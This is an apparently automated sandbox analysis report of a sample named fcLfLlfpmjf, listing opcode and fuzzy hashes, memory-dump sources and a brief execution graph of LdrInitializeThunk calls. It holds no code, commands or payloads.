                                                                                    • Opcode ID: 662827f64907d7e645d83782804556aae30863d640c538fa61f79e35cab45f83
                                                                                    • Instruction ID: ed73bd5abe163b321cdb514f7a31211d1cb9c734f757d4eefbdd6f4403e5d06d
                                                                                    • Opcode Fuzzy Hash: 662827f64907d7e645d83782804556aae30863d640c538fa61f79e35cab45f83
                                                                                    • Instruction Fuzzy Hash: AEE06D767002286F9314DAAEDC84D6BBBEDFBCD674365807AF908D7311DA319C0087A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b83c218a803d41d747385ef3721dda5d400b53aaffad6c68e5c4ba562a63467d
                                                                                    • Instruction ID: 03f2455a8bd2582392da9dba8edde178b2b85555beead6d2d776d717e9b278e1
                                                                                    • Opcode Fuzzy Hash: b83c218a803d41d747385ef3721dda5d400b53aaffad6c68e5c4ba562a63467d
                                                                                    • Instruction Fuzzy Hash: 5AF06938A1220CEFEF04EFB8E65555CBFB1BB48700B1041E9E406A7351EE701E84DB49
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf79aa442ad918ba36bf6d390dd7e7d7dbd0256a9b70565a452b70947300c7ad
                                                                                    • Instruction ID: 11355affc51410076d558f3bf129e6c8717dc11f538aff7dfa07bda5b816f12b
                                                                                    • Opcode Fuzzy Hash: cf79aa442ad918ba36bf6d390dd7e7d7dbd0256a9b70565a452b70947300c7ad
                                                                                    • Instruction Fuzzy Hash: 09F027312002118FE324AF39E80874A3BDAEF54328F00476CE15A8B6A0DFB6AD058FD4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b2bbb296aabc438d380dbf6c61adc5fa620fcc29db87f79f3435f07644c994a1
                                                                                    • Instruction ID: f64f57fe199d48f7d141b725d35d8d1abea30b00a94d2119514f503eaf2d94b5
                                                                                    • Opcode Fuzzy Hash: b2bbb296aabc438d380dbf6c61adc5fa620fcc29db87f79f3435f07644c994a1
                                                                                    • Instruction Fuzzy Hash: F3F0BE363002118FE704EF78E440AA937BAFB9530571049AAE1008B224CB70AC41CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ea82b8dc9a0c803d134100ca418b86ad5358ec12afdd429e1eba75b53db366c6
                                                                                    • Instruction ID: 61f4ef90e90e744d1ac25196b959e196aa760d9204cc68cf6527697f0e4aa922
                                                                                    • Opcode Fuzzy Hash: ea82b8dc9a0c803d134100ca418b86ad5358ec12afdd429e1eba75b53db366c6
                                                                                    • Instruction Fuzzy Hash: BAF0D435620125EFEF10DB68E6497A973F0FB1432EF040065E049DB1A1EBB9EA85CB65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef114a7112f63901b321abadb2b6cb8f33874630e6c7c541178f62ddb904fb60
                                                                                    • Instruction ID: 84350145a0a1c11028286bf04a1031b6df23f7d2082962b0bff94e104b710037
                                                                                    • Opcode Fuzzy Hash: ef114a7112f63901b321abadb2b6cb8f33874630e6c7c541178f62ddb904fb60
                                                                                    • Instruction Fuzzy Hash: 0EF0A0353012159FE704AF78E440D9A37AAFFD535431045A9F1048B224CAB1AC41CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d7ad6f1db220907163fb85d16fd28fb51361850fac837d178803c7c818e0e2e6
                                                                                    • Instruction ID: 898e796f63fb88c7b2e72c455676700d9d7e4f1640c8e7ab12fbc33ade5b124f
                                                                                    • Opcode Fuzzy Hash: d7ad6f1db220907163fb85d16fd28fb51361850fac837d178803c7c818e0e2e6
                                                                                    • Instruction Fuzzy Hash: C5F05430A407298FEB14EF79D5147AD7AB2FF54349F148478C415AB280EF785940CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bbffba47e68f14fbe3ac3428c167fcb724a69cf9c70caf521768f1c0cb7b8c0f
                                                                                    • Instruction ID: 873fbcd24ef3814686cf278e585c5470b63d4ab23be8986fdac790c3bca60804
                                                                                    • Opcode Fuzzy Hash: bbffba47e68f14fbe3ac3428c167fcb724a69cf9c70caf521768f1c0cb7b8c0f
                                                                                    • Instruction Fuzzy Hash: EBF0583110A2924FE7128B79AA24BE63FB5AB82214F09029AE291C7162DA686945CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 73175c4ef1f352e806ca1a2fd8f8845e2780f892c3e8273c6e3e284e9a3dabe8
                                                                                    • Instruction ID: ed6405bb662d442c5d7c1f2b682ce777506e949cc98ae3aedfc62027f36aa10e
                                                                                    • Opcode Fuzzy Hash: 73175c4ef1f352e806ca1a2fd8f8845e2780f892c3e8273c6e3e284e9a3dabe8
                                                                                    • Instruction Fuzzy Hash: 6EE04F72B052246B6B14EEB98D405AFBBEEDBD4155F10C4B9D808D7204FE30ED4187A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1e44b84d2f7bba97d82128feceede77f87c48bb7b232b2f1f81d07b73db813e7
                                                                                    • Instruction ID: 89a204f8eebcca85c5437ee0d106f3c2ac7b8b1c9baa9d5ac7ca19a5c42b712a
                                                                                    • Opcode Fuzzy Hash: 1e44b84d2f7bba97d82128feceede77f87c48bb7b232b2f1f81d07b73db813e7
                                                                                    • Instruction Fuzzy Hash: F4E0D83220431017F7659A19DC85BCBB3D6EFC1610B04862EE004AB314DA70BD4587DE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5a0f9a2ad0530b40f3bb5aa66e3c4f6bb12134787c5bd6be6ab51af011b054b3
                                                                                    • Instruction ID: 4946e2ac834a9994913a3acffeed094250ef5fcd12a23b9bc5a07630a77e2faa
                                                                                    • Opcode Fuzzy Hash: 5a0f9a2ad0530b40f3bb5aa66e3c4f6bb12134787c5bd6be6ab51af011b054b3
                                                                                    • Instruction Fuzzy Hash: 07E06D312007208BE3246B79E41834A76DAEF58728F14876DD09A8B7A0DFB5AD464BE5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6249c0b35c4f8c3e9dad398193ef440437526e63e08a51e5c72c07229a052b5
                                                                                    • Instruction ID: b1f3076d918028c805e4e553dce5238ca0fbbb35622206052c43580ec87e1afd
                                                                                    • Opcode Fuzzy Hash: a6249c0b35c4f8c3e9dad398193ef440437526e63e08a51e5c72c07229a052b5
                                                                                    • Instruction Fuzzy Hash: E3E0C976D0020CFBCF40DFE4EA85ACEBBB4EB58700F1181E6D806A2244EA745B459F84
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0986589efe45eef1894a42ef524f0fcffbc285c9cfbc1cbc0ced8b1afc595e3c
                                                                                    • Instruction ID: ea119b2af90b0978dd1f7e3a90e7c03fd618ce80552f0e872f76e69bf992a7be
                                                                                    • Opcode Fuzzy Hash: 0986589efe45eef1894a42ef524f0fcffbc285c9cfbc1cbc0ced8b1afc595e3c
                                                                                    • Instruction Fuzzy Hash: 7CF06674921229CFEB65DF58ED49B99BBB5FB05301F0055E6E409B2290CB701BC08F14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9eddd8d9dcf816ce15b81aaa2a26b6e2e1c0dfb12c648ad50d29bd3a44255329
                                                                                    • Instruction ID: 33865a663974f289e49b83a2f599020b16bd100ddab7ede12aba31e8ef308d49
                                                                                    • Opcode Fuzzy Hash: 9eddd8d9dcf816ce15b81aaa2a26b6e2e1c0dfb12c648ad50d29bd3a44255329
                                                                                    • Instruction Fuzzy Hash: 06E04F36201114CBD712EA18C588BD933A8FB4A358F1989B3F649EB624C675F8828745
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: # Vn^$3 Vn^$C Vn^$S Vn^
                                                                                    • API String ID: 0-343257227
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:0.1%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:1
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 62331 1552b60 LdrInitializeThunk

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 1552c0a-1552c0f 1 1552c11-1552c18 0->1 2 1552c1f-1552c26 LdrInitializeThunk 0->2
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0156FD4F,000000FF,00000024,01606634,00000004,00000000,?,-00000018,7D810F61,?,?,01528B12,?,?,?,?), ref: 01552C24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 4 1552b60-1552b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(01580DBD,?,?,?,?,01574302), ref: 01552B6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 7 1552df0-1552dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0158E73E,0000005A,015ED040,00000020,00000000,015ED040,00000080,01574A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0155AE00), ref: 01552DFA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001560000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001566000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.00000000015A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001603000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000014.00000002.1511174351.0000000001609000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_14e0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 6 1552c70-1552c7c LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0150FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01567BE5,00001000,00004000,000000FF,?,00000000), ref: 01552C7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1511174351.0000000001506000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: true
                                                                                    • Associated: 00000014.00000002.1511174351.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
